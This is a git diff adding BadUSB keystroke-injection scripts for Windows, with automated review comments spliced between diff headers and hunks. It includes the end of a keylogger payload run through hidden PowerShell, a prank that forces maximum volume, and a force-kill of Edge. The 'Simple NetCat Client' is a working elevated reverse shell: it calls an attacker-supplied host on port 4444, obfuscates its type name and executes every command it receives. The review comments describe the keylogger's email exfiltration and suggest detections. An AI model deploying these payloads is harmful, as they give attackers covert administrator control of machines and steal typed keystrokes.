+ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE 
+ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE + + +DELAY 10000 +REM save in temp directory. +DELAY 1000 +CTRL-SHIFT s +DELAY 1500 +STRING %temp% +ENTER +STRING txtlog.ps1 +DELAY 500 +TAB +DOWN +DOWN +ENTER +ENTER +DELAY 1000 +ALT F4 + +REM Open Powershell and start logs. +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit +ENTER + diff --git a/Rickroll with Max Volume spam.txt b/Rickroll with Max Volume spam.txt new file mode 100644 index 0000000..220d077 --- /dev/null +++ b/Rickroll with Max Volume spam.txt 
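Review bot: The header mislabels Keylogger to Email.txt: `REM Title: Email System & User Info (old)` and the description "gather system info" do not match the body, which polls `GetAsyncKeyState` across the key codes, appends the translated characters to `$env:temp\log.txt` and mails that file after each `$RunTime` window. Title and description should say that keystrokes are captured, e.g. `REM Title: Keylogger to Email` and `REM Description: Records keystrokes to a file and emails the log at a fixed interval`, since anyone triaging the repository by header would otherwise miss the most sensitive payload in the patch. Artifacts visible in this hunk are `txtlog.ps1` and `log.txt` in the temp directory, an `Add-Type` call importing `GetAsyncKeyState` from user32.dll, and SMTP submission to smtp.outlook.com on port 587 from powershell.exe.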
@@ -0,0 +1,51 @@ +REM Title: Rickroll with Max Volume spam +REM Author: @beigeworm +REM Description: Uses Powershell to create a .vbs script to keep volume maximised and opens youtube for rickroll. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM create the .vbs script to keep the volume maxed. +STRING cmd +ENTER +STRING copy con volup.vbs +ENTER +STRING do +ENTER +STRING Set WshShell = CreateObject("WScript.Shell") +ENTER +STRING WshShell.SendKeys(chr(&hAF)) +ENTER +STRING WScript.Sleep 10 +ENTER +STRING loop +ENTER +CTRL z +ENTER +STRING start volup.vbs +ENTER +DELAY 1000 +STRING exit +ENTER +DELAY 1000 + +REM start Microsoft Edge and open YouTube with Rick Astley - Never Gonna Give You Up. +GUI r +DELAY 1000 +STRING msedge.exe --new-window -kiosk https://www.youtube.com/watch?v=dQw4w9WgXcQ +ENTER +DELAY 2000 +STRING f + + + diff --git a/Set US Keyboard & System Language.txt b/Set US Keyboard & System Language.txt new file mode 100644 index 0000000..1866494 --- /dev/null +++ b/Set US Keyboard & System Language.txt @@ -0,0 +1,30 @@ +REM Title: Set System Language +REM Author: @beigeworm +REM Description: Uses Powershell to set the Windows system lanuage (exame is UK-US). +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM set system language to (example here is US) +STRING Dism /online /Get-Intl +ENTER +DELAY 500 +STRING Set-WinSystemLocale en-US +ENTER +DELAY 500 +STRING Set-WinUserLanguageList en-US -force +ENTER +DELAY 500 +STRING exit +ENTER + 
diff --git a/Simple NetCat Client.txt b/Simple NetCat Client.txt new file mode 100644 index 0000000..d442d52 --- /dev/null +++ b/Simple NetCat Client.txt @@ -0,0 +1,28 @@ +REM Title: Simple NetCat Client +REM Author: @beigeworm +REM Description: Uses Powershell to start a Netcat client that stays open until the system is restarted. +REM Target: Windows 10 + +REM *REQUIREMENTS* +REM start a netcat listener on server machine using port 4444 (eg. nc -lvp 4444). + +REM *SETUP* +REM replace YOUR_IP_OR_DOMAIN_HERE with ncat server address. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM write out the main Powershell code. +STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("YOUR_IP_OR_DOMAIN_HERE",4444) +STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) +STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5) +ENTER \ No newline at end of file diff --git a/Start Windows-93 (parody edition).txt b/Start Windows-93 (parody edition).txt new file mode 100644 index 0000000..4c8015e --- /dev/null +++ b/Start Windows-93 (parody edition).txt 
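Review bot: "Simple NetCat Client" understates what this file does. Every buffer read from the socket is passed to `iex` inside an elevated PowerShell and the output is written back, so it is a remote command shell, and nothing on the port 4444 channel authenticates the peer. Whoever answers at the configured address gets administrator command execution on the host. The description should say so, e.g. `REM Description: Connects out to a listener and executes every received command as administrator`, and should mention that the loop reconnects every 10 seconds. The mixed-case type name `SyStem.NeT.sockeTs.TCPClieNt` only defeats case-sensitive string matching, so detections should compare case-insensitively and key on powershell.exe holding an outbound TCP connection while calling `iex` on socket data.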
@@ -0,0 +1,33 @@ +REM Title: Start Windows-93 (parody edition) +REM Author: @beigeworm +REM Description: Kills all running egde processes then opens edge in fullscreen on windows-93. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open cmd and kill edge. +GUI r +DELAY 500 +STRING cmd +DELAY 200 +CTRL-SHIFT ENTER +DELAY 1000 +ALT y +DELAY 1000 +STRING taskkill /F /IM msedge.exe /T > nul +DELAY 100 +ENTER +DELAY 500 +STRING exit +ENTER + +REM open edge and fullscreen. +DELAY 500 +GUI r +DELAY 500 +STRING msedge -kiosk www.windows93.net +DELAY 100 +ENTER +DELAY 1000 +F11 \ No newline at end of file